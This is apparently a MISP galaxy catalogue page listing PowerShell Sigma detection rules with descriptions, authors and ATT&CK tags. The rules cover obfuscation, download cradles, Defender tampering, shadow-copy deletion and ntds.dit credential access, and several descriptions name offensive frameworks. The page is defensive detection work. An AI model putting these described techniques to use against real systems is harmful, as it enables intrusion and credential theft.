UUID c70e019b-1479-4b65-b0cc-cd0c6093a599 which can be used as unique global reference for PowerShell Called from an Executable Version Mismatch in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf (source), Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_pc_exe_calling_ps.yml
level high
logsource.category ps_classic_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']

PowerShell Downgrade Attack - PowerShell

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

Internal MISP references

UUID 6331d09b-4785-4c13-980f-f96661356249 which can be used as unique global reference for PowerShell Downgrade Attack - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)
creation_date 2017/03/22
falsepositive ['Unknown']
filename posh_pc_downgrade_attack.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001']

Delete Volume Shadow Copies Via WMI With PowerShell

Detects Shadow Copy deletion using operating system utilities via PowerShell

Internal MISP references

UUID 87df9ee1-5416-453a-8a08-e8d4a51e9ce1 which can be used as unique global reference for Delete Volume Shadow Copies Via WMI With PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/03
falsepositive ['Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason']
filename posh_pc_delete_volume_shadow_copies.yml
level high
logsource.category ps_classic_start
logsource.product windows
tags ['attack.impact', 'attack.t1490']

Suspicious XOR Encoded PowerShell Command Line - PowerShell

Detects a suspicious PowerShell process whose command line includes the bxor command, an alternative obfuscation method to Base64-encoded commands.

Internal MISP references

UUID 812837bb-b17f-45e9-8bd0-0ec35d2e3bd6 which can be used as unique global reference for Suspicious XOR Encoded PowerShell Command Line - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Harish Segar (rule)
creation_date 2020/06/29
falsepositive ['Unknown']
filename posh_pc_xor_commandline.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Tamper Windows Defender - PSClassic

Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP, or to set default actions to allow.

Internal MISP references

UUID ec19ebab-72dc-40e1-9728-4c0b805d722c which can be used as unique global reference for Tamper Windows Defender - PSClassic in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/06/07
falsepositive ['Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated.']
filename posh_pc_tamper_windows_defender_set_mp.yml
level high
logsource.category ps_classic_provider_start
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Zip A Folder With PowerShell For Staging In Temp - PowerShell

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 71ff406e-b633-4989-96ec-bc49d825a412 which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename posh_pc_susp_zip_compress.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']

Suspicious PowerShell Download

Detects suspicious PowerShell download command

Internal MISP references

UUID 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d which can be used as unique global reference for Suspicious PowerShell Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_pc_susp_download.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Renamed Powershell Under Powershell Channel

Detects a renamed PowerShell binary

Internal MISP references

UUID 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592 which can be used as unique global reference for Renamed Powershell Under Powershell Channel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harish Segar, frack113
creation_date 2020/06/29
falsepositive ['Unknown']
filename posh_pc_renamed_powershell.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Potential RemoteFXvGPUDisablement.EXE Abuse

Detects PowerShell module creation where the module contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary, which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID f65e22f9-819e-4f96-9c7b-498364ae7a25 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/13
falsepositive ['Unknown']
filename posh_pc_remotefxvgpudisablement_abuse.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Nslookup PowerShell Download Cradle

Detects a PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

Internal MISP references

UUID 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 which can be used as unique global reference for Nslookup PowerShell Download Cradle in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam
creation_date 2022/12/10
falsepositive ['Unknown']
filename posh_pc_abuse_nslookup_with_dns_records.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Alternate PowerShell Hosts - PowerShell Module

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Internal MISP references

UUID 64e8e417-c19a-475a-8d19-98ea705394cc which can be used as unique global reference for Alternate PowerShell Hosts - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/11
falsepositive ['Programs using PowerShell directly without invocation of a dedicated interpreter', 'MSP Detection Searcher', 'Citrix ConfigSync.ps1']
filename posh_pm_alternate_powershell_hosts.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

Detects obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 9ac8b09b-45de-4a07-9da1-0de8c09304a3 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_stdin.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Bad Opsec Powershell Code Artifacts

Detects trivial artifacts observed in variants of prevalent offensive PS1 payloads, including Cobalt Strike Beacon, PoshC2, PowerView, Letmein, Empire, PowerSploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

Internal MISP references

UUID 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 which can be used as unique global reference for Bad Opsec Powershell Code Artifacts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author ok @securonix invrep_de, oscd.community
creation_date 2020/10/09
falsepositive ['Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.']
filename posh_pm_bad_opsec_artifacts.yml
level critical
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Potential Active Directory Enumeration Using AD Module - PsModule

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration.

Internal MISP references

UUID 74176142-4684-4d8a-8b0a-713257e7df8e which can be used as unique global reference for Potential Active Directory Enumeration Using AD Module - PsModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/01/22
falsepositive ['Legitimate use of the library for administrative activity']
filename posh_pm_active_directory_module_dll_import.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.reconnaissance', 'attack.discovery', 'attack.impact']

PowerShell Get Clipboard

A general detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.

Internal MISP references

UUID 4cbd4f12-2e22-43e3-882f-bff3247ffb78 which can be used as unique global reference for PowerShell Get Clipboard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename posh_pm_get_clipboard.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.collection', 'attack.t1115']

PowerShell Decompress Commands

A general detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.

Internal MISP references

UUID 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 which can be used as unique global reference for PowerShell Decompress Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename posh_pm_decompress_commands.yml
level informational
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140']

AD Groups Or Users Enumeration Using PowerShell - PoshModule

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Internal MISP references

UUID 815bfc17-7fc6-4908-a55e-2f37b98cedb4 which can be used as unique global reference for AD Groups Or Users Enumeration Using PowerShell - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Administrator script']
filename posh_pm_susp_ad_group_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Invoke-Obfuscation Via Use Clip - PowerShell Module

Detects obfuscated PowerShell via use of Clip.exe in scripts

Internal MISP references

UUID ebdf49d8-b89c-46c9-8fdf-2c308406f6bd which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_clip.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

Detects obfuscated PowerShell via the VAR++ LAUNCHER

Internal MISP references

UUID f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_var.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Suspicious Get Local Groups Information

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID cef24b90-dddc-4ae1-a09a-8764872f69fc which can be used as unique global reference for Suspicious Get Local Groups Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Administrator script']
filename posh_pm_susp_local_group_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Suspicious Get-ADDBAccount Usage

Detects suspicious invocation of the Get-ADDBAccount script, which reads from an ntds.dit file and may be used to get access to credentials without using any credential dumpers

Internal MISP references

UUID b140afd9-474b-4072-958e-2ebb435abd68 which can be used as unique global reference for Suspicious Get-ADDBAccount Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/16
falsepositive ['Unknown']
filename posh_pm_get_addbaccount.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Clear PowerShell History - PowerShell Module

Detects keywords that could indicate clearing PowerShell history

Internal MISP references

UUID f99276ad-d122-4989-a09a-d00904a5f9d2 which can be used as unique global reference for Clear PowerShell History - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate PowerShell scripts']
filename posh_pm_clear_powershell_history.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block cited in the reference section below

Internal MISP references

UUID 2f211361-7dce-442d-b78a-c04039677378 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_obfuscated_iex.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Malicious PowerShell Commandlets - PoshModule

Detects Commandlet names from well-known PowerShell exploitation frameworks

Internal MISP references

UUID 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c which can be used as unique global reference for Malicious PowerShell Commandlets - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/20
falsepositive ['Unknown']
filename posh_pm_malicious_commandlets.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']

Remote PowerShell Session (PS Module)

Detects remote PowerShell sessions

Internal MISP references

UUID 96b9f619-aa91-478f-bacb-c3e50f8df575 which can be used as unique global reference for Remote PowerShell Session (PS Module) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
creation_date 2019/08/10
falsepositive ['Legitimate use remote PowerShell sessions']
filename posh_pm_remote_powershell_session.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']

Suspicious Get Information for SMB Share - PowerShell Module

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

Internal MISP references

UUID 6942bd25-5970-40ab-af49-944247103358 which can be used as unique global reference for Suspicious Get Information for SMB Share - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Administrator script']
filename posh_pm_susp_smb_share_reco.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Invoke-Obfuscation Via Use MSHTA - PowerShell Module

Detects obfuscated PowerShell via use of MSHTA in scripts

Internal MISP references

UUID 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_compress.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Download - PoshModule

Detects suspicious PowerShell download command

Internal MISP references

UUID de41232e-12e8-49fa-86bc-c05c7e722df9 which can be used as unique global reference for Suspicious PowerShell Download - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/05
falsepositive ['PowerShell scripts that download content from the Internet']
filename posh_pm_susp_download.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - PowerShell Module

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID c72aca44-8d52-45ad-8f81-f96c4d3c755e which can be used as unique global reference for Invoke-Obfuscation Via Stdin - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_stdin.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID a136cde0-61ad-4a61-9b82-8dc490e60dd2 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_clip.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Scripts - PoshModule

Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance

Internal MISP references

UUID 41025fd7-0466-4650-a813-574aaacbe7f4 which can be used as unique global reference for Malicious PowerShell Scripts - PoshModule in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/23
falsepositive ['Unknown']
filename posh_pm_exploit_scripts.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Generic - PowerShell Module

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID bbb80e91-5746-4fbe-8898-122e2cafdbf4 which can be used as unique global reference for Suspicious PowerShell Invocations - Generic - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/12
falsepositive ['Very special / sneaky PowerShell scripts']
filename posh_pm_susp_invocation_generic.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module

Detects SyncAppvPublishingServer process execution, which adversaries commonly use to bypass PowerShell execution restrictions.

Internal MISP references

UUID fe5ce7eb-dad8-467c-84a9-31ec23bd644a which can be used as unique global reference for SyncAppvPublishingServer Bypass Powershell Restriction - PS Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, OSCD Community
creation_date 2020/10/05
falsepositive ['App-V clients']
filename posh_pm_syncappvpublishingserver_exe.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Internal MISP references

UUID a23791fe-8846-485a-b16b-ca691e1b03d4 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_rundll.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - PowerShell Module

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_var.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Specific - PowerShell Module

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_pm_susp_invocation_specific.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Computer Machine Password by PowerShell

The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.

Internal MISP references

UUID e3818659-5016-4811-a73c-dde4679169d2 which can be used as unique global reference for Suspicious Computer Machine Password by PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/21
falsepositive ['Administrator PowerShell scripts']
filename posh_pm_susp_reset_computermachinepassword.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID 38a7625e-b2cb-485d-b83d-aff137d859f4 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename posh_pm_remotefxvgpudisablement_abuse.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use Get-NetTCPConnection - PowerShell Module

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID aff815cc-e400-4bf0-a47a-5d8a2407d4e1 which can be used as unique global reference for Use Get-NetTCPConnection - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename posh_pm_susp_get_nettcpconnection.yml
level low
logsource.category ps_module
logsource.product windows
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

Detects Obfuscated Powershell via use Rundll32 in Scripts

Internal MISP references

UUID 88a22f69-62f9-4b8a-aa00-6b0212f2f05a which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2019/10/08
falsepositive ['Unknown']
filename posh_pm_invoke_obfuscation_via_use_rundll32.yml
level high
logsource.category ps_module
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID daf7eb81-35fd-410d-9d7a-657837e602bb which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell Module in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename posh_pm_susp_zip_compress.yml
level medium
logsource.category ps_module
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Change User Agents with WebRequest

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Internal MISP references

UUID d4488827-73af-4f8d-9244-7b7662ef046e which can be used as unique global reference for Change User Agents with WebRequest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Unknown']
filename posh_ps_susp_invoke_webrequest_useragent.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Add Windows Capability Via PowerShell Script

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Internal MISP references

UUID 155c7fd5-47b4-49b2-bbeb-eb4fab335429 which can be used as unique global reference for Add Windows Capability Via PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.']
filename posh_ps_add_windows_capability.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution']

Powershell Token Obfuscation - Powershell

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Internal MISP references

UUID f3a98ce4-6164-4dd4-867c-4d83de7eca51 which can be used as unique global reference for Powershell Token Obfuscation - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/27
falsepositive ['Unknown']
filename posh_ps_token_obfuscation.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.009']
Related clusters

To see the related clusters, click here.

Usage Of Web Request Commands And Cmdlets - ScriptBlock

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs

Internal MISP references

UUID 1139d2e2-84b1-4226-b445-354492eba8ba which can be used as unique global reference for Usage Of Web Request Commands And Cmdlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Pemberton / @4A616D6573
creation_date 2019/10/24
falsepositive ['Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.']
filename posh_ps_web_request_cmd_and_cmdlets.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

Internal MISP references

UUID cacef8fc-9d3d-41f7-956d-455c6e881bc5 which can be used as unique global reference for Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['Unknown']
filename posh_ps_remotefxvgpudisablement_abuse.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Powershell Install a DLL in System Directory

Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"

Internal MISP references

UUID 63bf8794-9917-45bc-88dd-e1b5abc0ecfd which can be used as unique global reference for Powershell Install a DLL in System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
